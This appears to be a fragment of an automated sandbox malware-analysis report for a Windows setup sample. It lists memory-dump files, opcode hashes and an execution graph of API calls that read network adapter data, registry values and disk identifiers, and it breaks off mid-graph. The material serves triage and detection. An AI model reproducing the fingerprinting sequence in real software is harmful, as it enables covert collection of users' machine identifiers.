                                                                • Associated: 00000000.00000002.2246072290.0000000001B59000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2246072290.0000000001B66000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2246072290.0000000001B6D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2246072290.0000000001B95000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2246072290.0000000001B9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2246181597.0000000001B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2246181597.0000000001BB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_setup#U67e5#U8be2_pf2024.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d670a538bd4a908bd9d172d7d017f1d9a30ef3588fd3455cb1bb55c2a5594717
                                                                • Instruction ID: c503460450c058d637f37f3c5957b8e14723032a2e490da69ad7854ae5bc5bd0
                                                                • Opcode Fuzzy Hash: d670a538bd4a908bd9d172d7d017f1d9a30ef3588fd3455cb1bb55c2a5594717
                                                                • Instruction Fuzzy Hash: CBA0029B71A1A0249460312F7C89CCB4F5CD9C26791119ABBF305540870539448A80B4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0040663D Relevance: .0, Instructions: 8COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2244326748.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2244309235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.000000000049E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.0000000000D9D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.0000000000DA3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.0000000001445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.0000000001490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.000000000149C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.000000000149F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.00000000014AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.00000000014B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.00000000014B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.00000000014C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.00000000014C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.00000000014CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.00000000014D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.00000000014E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.00000000015BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.0000000001B05000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.0000000001B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2246072290.0000000001B43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2246072290.0000000001B59000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2246072290.0000000001B66000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2246072290.0000000001B6D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2246072290.0000000001B95000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2246072290.0000000001B9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2246181597.0000000001B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2246181597.0000000001BB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_setup#U67e5#U8be2_pf2024.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fd3b6e05cd61c41966590581ae0b27f4462787ac1419206677b8e0a8cfe5506b
                                                                • Instruction ID: 710516d69d16f6eecdadf0f8a0f108e889be14df6fe213f5d60dffe8aa32416a
                                                                • Opcode Fuzzy Hash: fd3b6e05cd61c41966590581ae0b27f4462787ac1419206677b8e0a8cfe5506b
                                                                • Instruction Fuzzy Hash: 49A0025724A760649460312B7C89CCB4F1CEDC667911115BFF109541460529448688B4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Execution Graph

                                                                Execution Coverage:6.2%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:9.1%
                                                                Total number of Nodes:1955
                                                                Total number of Limit Nodes:141
                                                                execution_graph 67541 6bdb4b5a 67542 6bdb4b68 CreateFileW 67541->67542 67543 6bdb4b66 67541->67543 67544 6bdb4b89 67542->67544 67545 6bdb4b8d VirtualAlloc 67542->67545 67543->67542 67546 6bdb4ba7 CloseHandle 67545->67546 67549 6bdb4bb2 67545->67549 67546->67544 67547 6bdb4bc3 ReadFile 67548 6bdb4bd4 FindCloseChangeNotification VirtualFree 67547->67548 67547->67549 67548->67544 67549->67547 67549->67548 67550 6bdb585a 7 API calls 67551 6bdb5a50 67550->67551 67552 6bdb59d4 ?get_log_instance@base@@YAPAVILogger@1 67550->67552 67553 6bdb5a87 ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@ 67551->67553 67554 6bdb59df 67552->67554 67556 6bdb5a3d 67552->67556 67553->67556 67555 6bdb5a0b GetLastError 67554->67555 67554->67556 67555->67556 67557 6bd83dda __EH_prolog3_GS 67567 6bd83d5c __EH_prolog3_GS 67557->67567 67559 6bd83e28 67560 6bd83e2e ?get_log_instance@base@@YAPAVILogger@1 67559->67560 67561 6bd83ea0 memset 67559->67561 67562 6bd83e72 67560->67562 67563 6bd83e39 67560->67563 67561->67562 67562->67562 67583 6bd0a3a0 67562->67583 67563->67562 67573 6bd1e945 __EH_prolog3_catch_GS 67563->67573 67566 6bd83f23 67568 6bd83d7e 67567->67568 67571 6bd83da7 67568->67571 67587 6bd85eca InterlockedCompareExchange 67568->67587 67571->67559 67572 6bd83d97 memmove 67572->67571 67813 6bd0f200 67573->67813 67575 6bd1e988 67576 6bd1e9b7 67575->67576 67577 6bd1e9aa 67575->67577 67578 6bd1e9c5 67576->67578 67580 6bd0f200 15 API calls 67576->67580 67579 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67577->67579 67581 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67578->67581 67582 6bd1e9b5 67579->67582 67580->67578 67581->67582 67582->67562 67584 6bd0a3ab 67583->67584 67586 6bd0a3c6 67583->67586 67585 6bd0a3e5 _invalid_parameter_noinfo_noreturn 67584->67585 67584->67586 67586->67566 67588 6bd85eea 67587->67588 67589 6bd85f16 67587->67589 67595 6bd85f39 __EH_prolog3_GS memset 67588->67595 67591 6bd85f1e memmove 67589->67591 67592 6bd85f10 SwitchToThread 67589->67592 67594 6bd83d93 67591->67594 67592->67589 67593 6bd85ef7 memmove InterlockedExchange 67593->67594 67594->67571 67594->67572 67670 6bd84e28 67595->67670 67597 6bd85ff9 67673 6bd84034 __EH_prolog3_GS memset GetVersionExA 67597->67673 67599 6bd861e3 67600 6bd86201 memset 67599->67600 67681 6bd851ce __EH_prolog3_GS _strnset_s memset SHGetFolderPathA 67600->67681 67601 6bd86019 67604 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67601->67604 67630 6bd86098 67601->67630 67603 6bd86308 67605 6bd865ab 67603->67605 67631 6bd86315 67603->67631 67604->67630 67608 6bd8661e 67605->67608 67609 6bd865b7 ?get_log_instance@base@@YAPAVILogger@1 67605->67609 67606 6bd8624b 67606->67603 67607 6bd8629b ?get_log_instance@base@@YAPAVILogger@1 67606->67607 67610 6bd862f5 CloseHandle 67607->67610 67611 6bd862a6 67607->67611 67616 6bd8662e ?get_log_instance@base@@YAPAVILogger@1 67608->67616 67617 6bd8654e 67608->67617 67627 6bd865c6 67609->67627 67643 6bd8651e 67609->67643 67613 6bd86561 67610->67613 67611->67610 67623 6bd862b5 67611->67623 67612 6bd8645a ?Init@md5@ ?Update@md5@@QAEXPAEI ?Finalize@md5@ 67614 6bd864a1 _memcpy_s 67612->67614 67615 6bd864b5 ?get_log_instance@base@@YAPAVILogger@1 67612->67615 67619 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67613->67619 67614->67615 67638 6bd864c0 67615->67638 67649 6bd864fd 67615->67649 67621 6bd86639 67616->67621 67650 6bd86676 67616->67650 67617->67613 67622 6bd8655a FindCloseChangeNotification 67617->67622 67624 6bd86570 67619->67624 67620 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67620->67643 67633 6bd86648 67621->67633 67621->67650 67622->67613 67635 6bd1e945 17 API calls 67623->67635 67625 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67624->67625 67632 6bd8657f 67625->67632 67639 6bd1e945 17 API calls 67627->67639 67627->67643 67628 6bd86696 67628->67628 67629 6bd8640f 67629->67612 67637 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67629->67637 67630->67599 67634 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67630->67634 67631->67629 67656 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67631->67656 67636 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67632->67636 67647 6bd1e945 17 API calls 67633->67647 67640 6bd86174 67634->67640 67641 6bd862e3 67635->67641 67642 6bd8658e 67636->67642 67637->67612 67646 6bd1e945 17 API calls 67638->67646 67638->67649 67639->67643 67644 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67640->67644 67641->67610 67645 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67642->67645 67643->67613 67702 6bd86756 __EH_prolog3_GS SetFilePointer 67643->67702 67648 6bd86183 67644->67648 67652 6bd8659d 67645->67652 67646->67649 67647->67650 67651 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67648->67651 67649->67620 67760 6bd86bf9 6 API calls 67650->67760 67653 6bd86192 67651->67653 67652->67593 67654 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67653->67654 67655 6bd861a1 67654->67655 67658 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67655->67658 67657 6bd863d3 67656->67657 67660 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67657->67660 67659 6bd861b0 67658->67659 67662 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67659->67662 67661 6bd863e2 67660->67661 67664 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67661->67664 67663 6bd861bf 67662->67663 67668 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67663->67668 67665 6bd863f1 67664->67665 67666 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67665->67666 67667 6bd86400 67666->67667 67669 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67667->67669 67668->67599 67669->67629 67761 6bd84e56 67670->67761 67672 6bd84e35 67672->67597 67674 6bd84089 67673->67674 67675 6bd840c2 67673->67675 67784 6bd84503 __EH_prolog3_GS 67674->67784 67675->67601 67677 6bd84096 67677->67675 67792 6bd840e5 __EH_prolog3_GS 67677->67792 67679 6bd840ac 67679->67675 67799 6bd8477f __EH_prolog3_GS 67679->67799 67682 6bd8525d 67681->67682 67699 6bd853de 67681->67699 67686 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67682->67686 67682->67699 67683 6bd85434 strncpy_s 67690 6bd852fa 67683->67690 67684 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67685 6bd85470 67684->67685 67685->67606 67687 6bd852c4 CreateDirectoryA 67686->67687 67688 6bd852ea GetLastError 67687->67688 67691 6bd85305 67687->67691 67689 6bd852f3 GetLastError 67688->67689 67688->67691 67689->67690 67689->67691 67690->67684 67692 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67691->67692 67693 6bd8533f CreateDirectoryA 67692->67693 67694 6bd85360 GetLastError 67693->67694 67696 6bd85370 67693->67696 67695 6bd85369 GetLastError 67694->67695 67694->67696 67695->67690 67695->67696 67697 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67696->67697 67698 6bd853aa CreateFileA 67697->67698 67698->67699 67700 6bd853e6 GetLastError 67698->67700 67699->67683 67699->67690 67700->67690 67701 6bd853ed CreateFileA 67700->67701 67701->67683 67701->67690 67703 6bd867bc GetFileSize 67702->67703 67704 6bd867b5 SetEndOfFile 67702->67704 67705 6bd867dd CreateFileA 67703->67705 67706 6bd867d5 67703->67706 67704->67703 67707 6bd86805 67705->67707 67706->67705 67706->67707 67708 6bd86831 memset 67707->67708 67709 6bd86825 CloseHandle 67707->67709 67711 6bd8684b 67708->67711 67713 6bd86878 67708->67713 67710 6bd86bf1 67709->67710 67710->67617 67712 6bd86853 __snprintf_s 67711->67712 67712->67712 67712->67713 67714 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67713->67714 67715 6bd86a82 67714->67715 67716 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67715->67716 67717 6bd86a91 67716->67717 67718 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67717->67718 67719 6bd86aa0 67718->67719 67720 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67719->67720 67721 6bd86aaf 67720->67721 67722 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67721->67722 67723 6bd86abb 67722->67723 67724 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67723->67724 67725 6bd86aca 67724->67725 67726 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67725->67726 67727 6bd86ad9 67726->67727 67728 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67727->67728 67729 6bd86ae8 67728->67729 67730 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67729->67730 67731 6bd86af7 67730->67731 67732 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67731->67732 67733 6bd86b06 67732->67733 67734 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67733->67734 67735 6bd86b12 67734->67735 67736 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67735->67736 67737 6bd86b1e 67736->67737 67738 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67737->67738 67739 6bd86b2d 67738->67739 67740 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67739->67740 67741 6bd86b3c 67740->67741 67742 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67741->67742 67743 6bd86b4b 67742->67743 67744 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67743->67744 67745 6bd86b5a 67744->67745 67746 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67745->67746 67747 6bd86b69 67746->67747 67748 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67747->67748 67749 6bd86b78 67748->67749 67750 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67749->67750 67751 6bd86b87 67750->67751 67752 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67751->67752 67753 6bd86b96 67752->67753 67754 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67753->67754 67755 6bd86ba6 WriteFile 67754->67755 67756 6bd86bde 67755->67756 67757 6bd86bd2 67755->67757 67759 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67756->67759 67757->67756 67758 6bd86bd7 CloseHandle 67757->67758 67758->67756 67759->67710 67760->67628 67762 6be24070 67761->67762 67763 6bd84e63 memset GetSystemDirectoryA PathAppendA LoadLibraryA 67762->67763 67764 6bd84eca GetProcAddress 67763->67764 67767 6bd84ec3 67763->67767 67765 6bd84ede GetAdaptersInfo 67764->67765 67766 6bd84fa6 FreeLibrary memset 67764->67766 67765->67766 67770 6bd84f00 67765->67770 67766->67767 67767->67672 67769 6bd84f12 memset 67769->67770 67771 6bd84fa0 67770->67771 67772 6bd84c53 RegOpenKeyExA 67770->67772 67771->67766 67773 6bd84cbd __snprintf_s RegOpenKeyExA 67772->67773 67774 6bd84e17 67772->67774 67775 6bd84e0f RegCloseKey 67773->67775 67776 6bd84d04 RegQueryValueExA 67773->67776 67774->67769 67775->67774 67777 6bd84d45 memset RegQueryValueExA 67776->67777 67778 6bd84e07 RegCloseKey 67776->67778 67777->67778 67779 6bd84d96 67777->67779 67778->67775 67780 6bd84da1 strlen strncmp 67779->67780 67783 6bd84dc4 67779->67783 67781 6bd84dc8 67780->67781 67780->67783 67782 6bd84dd3 strlen strncmp 67781->67782 67781->67783 67782->67783 67783->67778 67790 6bd8453d 67784->67790 67785 6bd84779 67785->67677 67786 6bd84545 memset __snprintf_s CreateFileA 67787 6bd8459a memset DeviceIoControl 67786->67787 67786->67790 67788 6bd845e1 memset memset DeviceIoControl 67787->67788 67787->67790 67789 6bd8475c FindCloseChangeNotification 67788->67789 67788->67790 67789->67790 67790->67785 67790->67786 67790->67789 67791 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67790->67791 67791->67790 67798 6bd8411f 67792->67798 67793 6bd842fc 67793->67679 67794 6bd84127 memset __snprintf_s CreateFileA 67794->67798 67795 6bd84184 memset memmove DeviceIoControl 67795->67798 67796 6bd842d9 FindCloseChangeNotification 67796->67798 67797 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67797->67798 67798->67793 67798->67794 67798->67795 67798->67796 67798->67797 67800 6bd847ad 67799->67800 67801 6bd84a91 67800->67801 67802 6bd847b5 memset __snprintf_s CreateFileA 67800->67802 67801->67675 67802->67800 67803 6bd84806 memset memset DeviceIoControl 67802->67803 67804 6bd84a7a GetLastError 67803->67804 67805 6bd84872 memset memset memset 67803->67805 67806 6bd84a80 CloseHandle 67804->67806 67810 6bd848c6 67805->67810 67806->67800 67807 6bd848ff isalnum 67808 6bd84914 isalnum 67807->67808 67807->67810 67808->67806 67808->67810 67809 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67809->67810 67810->67807 67810->67809 67812 6bd84a39 67810->67812 67811 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67811->67812 67812->67806 67812->67811 67814 6bd0f222 67813->67814 67815 6bd0f20e 67813->67815 67816 6bd0f233 memset 67814->67816 67817 6bd0f259 67814->67817 67815->67575 67816->67575 67821 6bd0fd30 67817->67821 67820 6bd0f26a 67820->67575 67822 6bd0fd55 67821->67822 67825 6bd0fe7a 67821->67825 67823 6bd0fd91 67822->67823 67824 6bd0fdbb 67822->67824 67844 6be22dcc 67823->67844 67827 6bd0fda2 67824->67827 67828 6be22dcc std::_Facet_Register 4 API calls 67824->67828 67831 6bd0fee1 67825->67831 67832 6bd0ff0b 67825->67832 67829 6bd0fe51 memmove memset 67827->67829 67830 6bd0fdf6 memmove memset 67827->67830 67833 6bd0fe4b _invalid_parameter_noinfo_noreturn 67827->67833 67828->67827 67829->67820 67834 6bd0fe22 67830->67834 67835 6bd0fe32 67830->67835 67836 6be22dcc std::_Facet_Register 4 API calls 67831->67836 67837 6bd0fef2 67832->67837 67838 6be22dcc std::_Facet_Register 4 API calls 67832->67838 67833->67829 67834->67833 67834->67835 67835->67820 67836->67837 67839 6bd0ff94 _invalid_parameter_noinfo_noreturn 67837->67839 67840 6bd0ff9a memmove memmove 67837->67840 67841 6bd0ff3f memmove memmove 67837->67841 67838->67837 67839->67840 67840->67820 67842 6bd0ff6b 67841->67842 67843 6bd0ff7b 67841->67843 67842->67839 67842->67843 67843->67820 67845 6be22dde malloc 67844->67845 67846 6be22dd1 _callnewh 67845->67846 67847 6be22deb 67845->67847 67846->67845 67849 6be22ded 67846->67849 67847->67827 67848 6be24833 67850 6be24841 _CxxThrowException 67848->67850 67849->67848 67851 6be24824 _CxxThrowException 67849->67851 67851->67848 67852 6be26060 67853 6be26098 67852->67853 67854 6be260b0 67853->67854 67855 6be260a8 TlsSetValue 67853->67855 67859 6bd9b98a __EH_prolog3_GS ?get_log_instance@base@@YAPAVILogger@1 67854->67859 67874 6bd9b397 67854->67874 67855->67854 67856 6be260be 67860 6bd9b9f1 GetTickCount 67859->67860 67868 6bd9b9a6 67859->67868 67861 6bd9bb5e 67860->67861 67862 6bd9ba12 67860->67862 67900 6bd9aaa0 __EH_prolog3_GS ?get_log_instance@base@@YAPAVILogger@1 67861->67900 67863 6bd9ba18 GetTickCount 67862->67863 67881 6bd9b3cc 67863->67881 67865 6bd9bb6b 67865->67856 67867 6bd9b397 36 API calls 67869 6bd9ba2b 67867->67869 67868->67860 67869->67867 67870 6bd9ba3d ?get_log_instance@base@@YAPAVILogger@1 67869->67870 67871 6bd9bb43 Sleep 67869->67871 67873 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67869->67873 67894 6bd2a76f __EH_prolog3_GS 67869->67894 67870->67869 67871->67861 67871->67863 67873->67869 67875 6bd9b3c0 Sleep 67874->67875 67876 6bd9b3a3 67874->67876 67875->67856 67993 6bd9b8ba 67876->67993 67878 6bd9b3aa 67879 6bd9ab89 33 API calls 67878->67879 67880 6bd9b3b5 67878->67880 67879->67880 67880->67856 67882 6be24070 67881->67882 67883 6bd9b3e7 memset std::_Cnd_initX 67882->67883 67884 6bd9b47a std::_Cnd_initX 67883->67884 67885 6bd9b43f memmove 67883->67885 67886 6bd9b492 std::_Cnd_initX 67884->67886 67888 6bd9b48e 67884->67888 67887 6bd9b473 67885->67887 67889 6bd9b4f3 std::_Cnd_initX 67886->67889 67890 6bd9b4b2 memmove 67886->67890 67887->67884 67904 6bd9abc3 __EH_prolog3_GS 67888->67904 67889->67888 67892 6bd9b51d 67889->67892 67891 6bd9b4e6 67890->67891 67891->67889 67892->67869 67896 6bd2a7d7 67894->67896 67895 6bd2a834 67895->67869 67896->67895 67962 6bd2ea2f __EH_prolog3_GS 67896->67962 67898 6bd2a828 67899 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67898->67899 67899->67895 67903 6bd9aab9 67900->67903 67902 6bd9ab0b 67902->67865 67985 6bd9a880 __EH_prolog3_GS 67903->67985 67905 6bd9abec 67904->67905 67906 6bd9ac16 Concurrency::details::platform::__RegisterWaitForSingleObject 67905->67906 67908 6bd9ac2c 67905->67908 67907 6bd9afc7 67906->67907 67907->67892 67909 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67908->67909 67910 6bd9acaa 67909->67910 67911 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67910->67911 67912 6bd9acd8 ?ConvertQosToJsonString@qos@adapt_for_imports@ierd_tgp@@YAXABUtagQOSRep@@PAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@_N 67911->67912 67913 6bd9ad3e 67912->67913 67914 6bd9ae9b ?get_log_instance@base@@YAPAVILogger@1 67913->67914 67915 6bd9add5 ?get_log_instance@base@@YAPAVILogger@1 67913->67915 67917 6bd9af47 67914->67917 67921 6bd9aeaa 67914->67921 67922 6bd9ade4 67915->67922 67932 6bd9ae72 67915->67932 67919 6bd9af9c 67917->67919 67923 6bd9af87 Concurrency::details::platform::__RegisterWaitForSingleObject 67917->67923 67918 6bd9ae96 67920 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67918->67920 67938 6bd9afd1 67919->67938 67925 6bd9afbb 67920->67925 67921->67917 67927 6bd2a76f 27 API calls 67921->67927 67928 6bd2a76f 27 API calls 67922->67928 67922->67932 67923->67918 67926 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67925->67926 67926->67907 67931 6bd9aef0 67927->67931 67929 6bd9ae28 67928->67929 67930 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67929->67930 67930->67932 67933 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67931->67933 67934 6bd9ab89 67932->67934 67933->67917 67936 6bd9ab9d 67934->67936 67935 6bd9aaa0 33 API calls 67937 6bd9abc0 67935->67937 67936->67935 67936->67937 67937->67918 67939 6be24070 67938->67939 67940 6bd9afec std::_Cnd_initX memmove 67939->67940 67941 6bd99f50 67940->67941 67942 6bd9b052 std::_Cnd_initX ?get_log_instance@base@@YAPAVILogger@1 67941->67942 67945 6bd9b06c 67942->67945 67949 6bd9b0ea 67942->67949 67944 6bd9b10c 67944->67918 67946 6bd2a76f 27 API calls 67945->67946 67945->67949 67947 6bd9b0af 67946->67947 67948 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67947->67948 67948->67949 67950 6bd9a6ca __EH_prolog3 67949->67950 67951 6bd9a6e5 std::_Cnd_initX 67950->67951 67956 6bd9a783 67950->67956 67952 6bd9a6fb std::_Cnd_initX 67951->67952 67953 6bd9a70a 67951->67953 67952->67956 67954 6be22dcc std::_Facet_Register 4 API calls 67953->67954 67955 6bd9a718 67954->67955 67958 6bd9a739 67955->67958 67960 6bd99e5d __EH_prolog3 67955->67960 67956->67944 67959 6bd9a774 std::_Cnd_initX 67958->67959 67959->67956 67961 6bd99e86 67960->67961 67961->67958 67963 6bd2ea4f 67962->67963 67964 6bd2ea71 ?widen@?$ctype@D@std@@QBEDD 67963->67964 67965 6bd2eaab 67964->67965 67979 6bd2e69d __EH_prolog3_GS 67965->67979 67968 6bd2ecd6 ?widen@?$ctype@D@std@@QBEDD 67978 6bd2ed22 67968->67978 67969 6bd2eab6 67969->67968 67970 6bd2ed75 67969->67970 67971 6bd2ed90 ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 67970->67971 67972 6bd2eda2 ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 67971->67972 67973 6bd2ede9 67971->67973 67972->67973 67974 6bd2edb5 67972->67974 67973->67898 67975 6bd2edd0 ?gbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH 67974->67975 67976 6bd2edc3 ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 67974->67976 67975->67973 67977 6bd2eddf ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 67975->67977 67976->67973 67976->67975 67977->67973 67978->67898 67980 6bd2e6ba 67979->67980 67981 6bd2e6c5 ?widen@?$ctype@D@std@@QBEDD 67980->67981 67982 6bd2e6e5 67981->67982 67983 6bd0f200 15 API calls 67982->67983 67984 6bd2e791 67983->67984 67984->67969 67986 6bd9aa9a 67985->67986 67989 6bd9a8a7 67985->67989 67986->67902 67987 6bd9a984 ?get_log_instance@base@@YAPAVILogger@1 67987->67989 67988 6bd9a92d ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123 67988->67989 67989->67986 67989->67987 67989->67988 67990 6bd9a967 ?report@Qos@qos@adapt_for_imports@ierd_tgp@@QAE_NABUQos_data_base@234@W4Qos_occasion@234@ 67989->67990 67991 6bd2a76f 27 API calls 67989->67991 67992 6bd0a3a0 _invalid_parameter_noinfo_noreturn 67989->67992 67990->67989 67991->67989 67992->67989 67994 6bd9b8db 67993->67994 67995 6bd9b94e 67993->67995 67996 6bd9b952 select 67994->67996 67997 6bd9b946 Sleep 67994->67997 67995->67878 67996->67995 67997->67995 67998 6bd31650 __EH_prolog3 67999 6bd31677 67998->67999 68002 6bd31e4a __EH_prolog3_GS 67999->68002 68001 6bd31689 68003 6bd31e62 68002->68003 68004 6bd31e7d 68003->68004 68009 6bd30f05 __EH_prolog3_GS 68003->68009 68018 6bd31b55 __EH_prolog3_GS 68004->68018 68007 6bd31e91 GetTickCount 68008 6bd31eac 68007->68008 68008->68001 68010 6bd31b55 __EH_prolog3_GS 68009->68010 68011 6bd30f31 68010->68011 68012 6bd30f74 memset GetCurrentProcessId 68011->68012 68013 6bd30fce 68012->68013 68014 6bd30fe4 CreateThread ?get_log_instance@base@@YAPAVILogger@1 68013->68014 68015 6bd31064 68014->68015 68016 6bd3101c 68014->68016 68020 6bd3109d __EH_prolog3_GS 68014->68020 68015->68004 68016->68015 68017 6bd1e945 17 API calls 68016->68017 68017->68015 68019 6bd31b69 68018->68019 68019->68007 68021 6bd310b0 68020->68021 68028 6bd310b8 68020->68028 68022 6bd310fd WaitForSingleObject 68022->68021 68022->68028 68023 6bd3111b ResetEvent 68023->68028 68024 6bd3117d ResetEvent 68024->68028 68025 6bd3114f GetTickCount 68026 6bd3115d 68025->68026 68025->68028 68026->68028 68027 6bd3122a ?_Xbad_function_call@std@ 68028->68021 68028->68022 68028->68023 68028->68024 68028->68025 68028->68027 68029 6bd31b55 __EH_prolog3_GS 68028->68029 68032 6bd83f74 __EH_prolog3_GS 